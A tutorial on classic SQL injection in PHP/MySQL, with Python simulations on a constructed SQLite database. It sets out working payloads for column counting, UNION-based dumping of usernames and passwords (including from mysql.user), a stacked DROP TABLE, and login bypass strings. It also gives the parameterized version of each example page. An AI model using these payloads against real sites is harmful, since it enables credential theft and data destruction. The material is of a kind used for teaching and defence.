SQL injection how to?

In this tutorial I will describe how SQL injection works and how to tell whether your site is in danger of being hacked through SQL injection. The article is divided into 2 parts: the first part teaches you how the attacker works (not how to be a hacker).
The second part will cover methods of preventing SQL injection attacks.

 

First of all: What is SQL injection?

It's one of the most common vulnerabilities in web applications today.
It occurs when input the user controls (a URL parameter, a form field) is pasted into the text of a database query, so that part of the input is parsed as SQL instead of being treated as data. In short, it gives the attacker the ability to ask the database any question, with the privileges of the application's database account, and therefore to control the database and the data within.

A SQL injection attack is possible when a web page takes text from a textbox or from the URL and uses it to build a query that is run against the database. If the application builds SQL strings naively on the fly and then runs them, it is straightforward to create some real surprises. It can be relatively simple for an attacker to find out enough about how the database is structured to log in as an administrator of the organization's website.

With SQL injection, attackers can gain control of the database (how much control depends on the privileges of the database account the application uses), with the consequence that they may be able to manipulate the database to do anything they wish, including:

  • Read all account details in the system, including user names and passwords (or password hashes)
  • Shut down the database
  • Read and write files on the database server and, through that, interact with the OS
  • Use the compromised database server to reach and attack other machines on its network
  • Corrupt, delete or change data
  • Online shoplifting, e.g. changing the price of a product or service so that the cost is negligible or free
  • Insert a bogus name and credit card into the system to scam it at a later date
  • Delete the database and all its contents

 

There are 2 types of SQL injection:

1. SQL injection (call it classic): the results of the injected query, or the database's error messages, are shown directly in the page.

2. Blind SQL injection (the harder part): nothing from the query is shown, and the attacker has to infer the answer from differences in how the page behaves.

 

So let's start with some action. This article is concerned with the classic injection; the 2nd part of the article will be about preventing it.

So first we need to know how the attacker works, so we know how to deal with him and write our code knowing what can happen if we take things lightly.

1). Check for vulnerability

Let's say that we have a dynamic news web page that gets the news by id

http://www.website.com/news.php?id=1

Now to test whether it is vulnerable we add a quote (') to the end of the URL,

and that would be http://www.website.com/news.php?id=1'

so if we get an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use..."
or something similar,

that means the quote reached the SQL parser unescaped, and the page is vulnerable to SQL injection :)
(The opposite does not hold: if the site hides database errors you see nothing, but the query may still be injectable; that is the blind case.)

now I expect the code behind this news page looks like this (deliberately vulnerable: $id comes straight from the URL into the query text, using the old mysql_* functions this article is written against)

$id = $_GET['id'];                                          // untrusted input, used as-is
$sqlProducts = "select * from news where news_id=$id";      // pasted into the SQL string
$rsProducts = mysql_query($sqlProducts) or die(mysql_error()); // error text shown to the visitor

 

2). Find the number of columns

To find the number of columns in the query's select list we use ORDER BY (it tells the database how to sort the result). ORDER BY n sorts by the n-th column of the select list, so it only works while n is not larger than the number of columns.

so how to use it? Well, just increment the number until we get an error.

http://www.website.com/news.php?id=5 order by 1/* <-- no error

http://www.website.com/news.php?id=5 order by 2/* <-- no error

http://www.website.com/news.php?id=5 order by 3/* <-- no error

http://www.website.com/news.php?id=5 order by 4/* <-- error
 (we get a message like Unknown column '4' in 'order clause' or something like that)

(the trailing /* is meant to comment out whatever the application appends after our input; whether the server tolerates an unclosed comment depends on the MySQL version, so -- followed by a space, or #, are the usual alternatives)

that means the query selects 3 columns, because we got an error on 4.

3). Check for UNION

With UNION we can append the rows of a second SELECT to the result of the first in one SQL statement. The UNION SELECT must return the same number of columns as the original SELECT, and in the case of SELECT * queries that number is not known in advance.

That's why I wanted to know how many columns the query has: so I can use the UNION clause.

so we have

http://www.website.com/news.php?id=5+union+all+select+1,2,3
 (we already found in section 2 that the number of columns is 3; the + signs are just URL-encoded spaces)

if we see some of those numbers on screen, i.e. 1 or 2 or 3, then the UNION works :) and we also learn which column positions the page displays
and thus the attacker has found a great and easy security hole in your website; I can tell you now you are in great danger

so now the attacker can use the UNION to read whatever the database account can see, by injecting his own SELECT into your query and letting the page display its results, easy!

For example, the attacker can do this
http://www.website.com/news.php?id=5+union+all+select+1,username,password+from+users

(username and password go in the positions the page displays; the positions it doesn't show are left as numbers.) He now has a full list of usernames and passwords of your users. I bet he can do a lot; the possibilities are unlimited.
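Here is the whole procedure of steps 1 to 3 run against a simulated vulnerable page. This is an added example, not code from the original article: it uses Python with an in-memory SQLite database as a stand-in for the PHP/MySQL setup (an assumption; SQLite's error texts differ from MySQL's and it has neither concat() nor the /* trick), with constructed news and users tables, and it puts the hardened parameterized version of the same page beside the vulnerable one.

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for the site's database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (news_id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Hello', 'first post'), (5, 'Five', 'fifth post');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def news_page(conn, id_param):
    """Models news.php: the id parameter is pasted straight into the SQL text.
    Returns the rows, or the database error as a string (like die(mysql_error()))."""
    sql = "select * from news where news_id=" + id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return "SQL error: " + str(e)


def news_page_safe(conn, id_param):
    """Same page with a bound parameter: the input is a value, never SQL."""
    return conn.execute("select * from news where news_id=?", (id_param,)).fetchall()


def step1_quote_test(conn):
    """Step 1: id=1' makes the parser choke, so the input reached it unescaped."""
    return news_page(conn, "1'")


def step2_count_columns(conn, max_cols=20):
    """Step 2: ORDER BY n works while n <= number of columns in the select list."""
    for n in range(1, max_cols + 1):
        if isinstance(news_page(conn, "5 order by %d" % n), str):
            return n - 1
    return None


def step3_union_dump(conn, ncols):
    """Step 3: UNION ALL SELECT with the same column count appends rows from users.
    Positions 2 and 3 carry username and password; any extra positions get numbers."""
    select_list = ["1", "username", "password"] + [str(i) for i in range(4, ncols + 1)]
    payload = "5 union all select " + ",".join(select_list) + " from users"
    return news_page(conn, payload)


def leaked_credentials(conn):
    """Runs the three steps and returns the (username, password) pairs that leaked."""
    if not isinstance(step1_quote_test(conn), str):
        return []
    ncols = step2_count_columns(conn)
    rows = step3_union_dump(conn, ncols)
    real_rows = set(news_page(conn, "5"))  # the genuine news item(s) for id 5
    return [(row[1], row[2]) for row in rows if row not in real_rows]


if __name__ == "__main__":
    conn = build_db()
    print(step1_quote_test(conn))
    print("columns:", step2_count_columns(conn))
    print("leaked:", leaked_credentials(conn))
    print("safe page:", news_page_safe(conn, "5 union all select 1,username,password from users"))
```

Run it as a script to see the three steps play out; the parameterized news_page_safe returns no rows for the same payloads because the whole string is compared against news_id as a value.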

4). Getting table and column names

well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) there is no information_schema to list them,
so we must guess table and column names in most cases. (On MySQL 5 and later, information_schema.tables and information_schema.columns can be read through the same UNION to get the real names.)

common table names are: user/s, admin/s, member/s, login/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e. would be

http://www.site.com/news.php?id=5+union+all+select+1,2,3+from+admin

(we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5+union+all+select+1,username,3+from+admin

 (if you get an error, try the next column name from the list)

we get a username displayed on screen, for example admin, or superadmin or whatever...

now to check whether the password column exists

http://www.site.com/news.php?id=5+union+all+select+1,password,3+from+admin (if you get an error, try the other column names)

we see the password on the screen, as a hash or in plain text; it depends on how the application stores it :)

i.e. an md5 hash, a MySQL PASSWORD() hash, sha1...

now let's make the output look nice :)

for that we can use the concat() function (it joins strings), so both values come back in the one displayed column

i.e.

http://www.site.com/news.php?id=5+union+all+select+1,concat(username,0x3a,password),3+from+admin

 

Note that I put 0x3a, the hex value for : (colon); a hex literal avoids putting another quote into the injected string

(there is another way to do that, char(58), 58 being the ASCII code for :)

 

http://www.site.com/news.php?id=5+union+all+select+1,concat(username,char(58),password),3+from+admin

now we get username:password displayed on screen, i.e. admin:admin or admin:somehash

when you have this, you can log in as admin or some superuser :D

if you can't guess the right table name, you can always try mysql.user (the server's own account table)

it has user and password columns (in MySQL 5.7 and later the password column was replaced by authentication_string), so an example would be

http://www.site.com/news.php?id=5+union+all+select+1,concat(user,0x3a,password),3+from+mysql.user

(this only works if the application's database account is allowed to read the mysql database, which a well-configured site won't grant)

5). Dropping tables

Now it's the intruder's turn to inject a SQL command in the URL of the page. If the application quotes the id in its query (WHERE id='$id'), the injected value might look like this
1'; DROP TABLE product; #

and the URL looks like this

http://www.website.com/news.php?id=1'; DROP TABLE product; #

Now the query becomes

SELECT * FROM news WHERE id='1'; DROP TABLE product; #';

The hash "#" tells the MySQL server to ignore the rest of the line, so the trailing single quote (') that the application appends is simply skipped.

One caveat: this is a stacked query (two statements in one string), and PHP's mysql_query() sends only one statement per call, so against the code shown earlier the server rejects it with a syntax error. It works where the driver allows several statements (e.g. mysqli_multi_query) or on database servers that accept them by default.
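The stacked-query caveat just described, as an added example that is not part of the original article: Python with an in-memory SQLite database stands in for PHP/MySQL (an assumption). sqlite3's execute() runs exactly one statement, like mysql_query(), while executescript() runs every statement in the string, like mysqli_multi_query(). SQLite has no # comment, so the payload uses -- instead.

```python
import sqlite3

# The article's injected value with -- in place of # (assumption: SQLite stands in
# for MySQL here and does not recognise the # comment).
PAYLOAD = "1'; DROP TABLE product; -- "


def build_db():
    """Constructed sample tables (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'Hello');
        CREATE TABLE product (id INTEGER, price REAL);
        INSERT INTO product VALUES (1, 9.99);
    """)
    return conn


def table_exists(conn, name):
    """True if a table of that name is still in the schema."""
    row = conn.execute(
        "select count(*) from sqlite_master where type='table' and name=?", (name,)
    ).fetchone()
    return row[0] == 1


def build_query(id_param):
    """Models news.php quoting the id in its query: WHERE id='$id'."""
    return "SELECT * FROM news WHERE id='%s'" % id_param


def single_statement_api(conn, id_param):
    """Like mysql_query(): one statement per call; anything stacked behind it is rejected."""
    try:
        conn.execute(build_query(id_param))
        return "ok"
    except (sqlite3.ProgrammingError, sqlite3.Warning) as e:
        # sqlite3 reports "You can only execute one statement at a time."
        return "refused: " + str(e)


def multi_statement_api(conn, id_param):
    """Like mysqli_multi_query(): every statement in the string is executed in turn."""
    conn.executescript(build_query(id_param))
    return "ok"


if __name__ == "__main__":
    conn = build_db()
    print(build_query(PAYLOAD))
    print(single_statement_api(conn, PAYLOAD), "/ product exists:", table_exists(conn, "product"))
    print(multi_statement_api(conn, PAYLOAD), "/ product exists:", table_exists(conn, "product"))
```

The single-statement API leaves the product table in place; the multi-statement API runs the DROP. Whether a stacked payload works is therefore a property of the driver call, not of the injection itself.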

those were just a few examples of SQL injection through the URL to get a malicious query into your code. You might think: well, OK, I will not use this kind of URL, news.php?id=1. If you manage to do that, I want to tell you there is another place the attacker will look at when thinking about your site, which is the HTML forms.
yes, HTML forms are a great security hole too

Everything between <FORM> and </FORM> is a potential parameter that might be useful (attacker-wise).

For example a login form

<FORM action=login.php method=post>
<input name="username" type="text" id="username" size="15">
<input name="password" type="text" id="password" size="15">
<input type=hidden name=A value=C>
</FORM>

He will just save the site's HTML source on his own computer, change the form action to the full URL and fill in the fields and the hidden field with his payload (or simply type the payload into the live login form). Example:

<FORM action=http://www.yoursite.com/login.php method=post>
<input name="username" type="text" id="username" size="15" value="hi' or 1=1">
<input name="password" type="text" id="password" size="15">
<input type=hidden name=A value="hi' or 1=1--">
</FORM>

If luck is on his side, he is logged in without knowing any username or password. With hi' or 1=1-- in the username field the query looks like this

select * from users where username='hi' or 1=1-- ' and password=''

The -- starts a comment (in MySQL it must be followed by a space), so the rest of the line, including the password check, is ignored, and since 1=1 is always true the query returns rows and the login succeeds. Note that without the comment the precedence works against him: in username='hi' or 1=1 and password='...' the AND binds more tightly than the OR, so the password is still checked.
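The login bypass above, including the precedence point, as an added example that is not part of the original article: Python with an in-memory SQLite users table standing in for the PHP/MySQL login.php (an assumption), a constructed admin row, and the parameterized login beside the vulnerable one.

```python
import sqlite3


def build_db():
    """Constructed users table with one account (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'correct-horse');
    """)
    return conn


def build_login_query(username, password):
    """Models login.php: both form fields are concatenated into the SQL text."""
    return "select * from users where username='%s' and password='%s'" % (username, password)


def login(conn, username, password):
    """Vulnerable login: True if the concatenated query returns any row at all."""
    try:
        return conn.execute(build_login_query(username, password)).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntax error just looks like a failed login


def login_safe(conn, username, password):
    """Same check with bound parameters: the payloads become ordinary string values."""
    row = conn.execute(
        "select * from users where username=? and password=?", (username, password)
    ).fetchone()
    return row is not None


# Payloads: the first two are the article's, the third is the classic variant
# (added here) that needs no comment because it fixes up the quoting itself.
NO_COMMENT = "hi' or 1=1"       # AND binds tighter than OR: password is still checked
WITH_COMMENT = "hi' or 1=1-- "  # comments out the password clause (MySQL needs the space)
QUOTED_TRUE = "' or '1'='1"     # put in both fields: ... or '1'='1' ends the WHERE as true

if __name__ == "__main__":
    conn = build_db()
    for user, pw in [("admin", "correct-horse"), (NO_COMMENT, "x"),
                     (WITH_COMMENT, "x"), (QUOTED_TRUE, QUOTED_TRUE)]:
        print(build_login_query(user, pw))
        print("  vulnerable:", login(conn, user, pw), " safe:", login_safe(conn, user, pw))
```

The run shows the page's original claim does not hold for the bare hi' or 1=1 payload: the password is still checked. The commented payload and the doubled ' or '1'='1 both log in against the concatenated query, and none of them pass the parameterized one.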

I bet you are amazed by now at what an attacker can do with your website, and I want to tell you that this is not limited to websites developed with PHP and a MySQL database: every other database and web development language is just as vulnerable to SQL injection when queries are built from untrusted input. However, my specialty is PHP, so that's what I can talk about.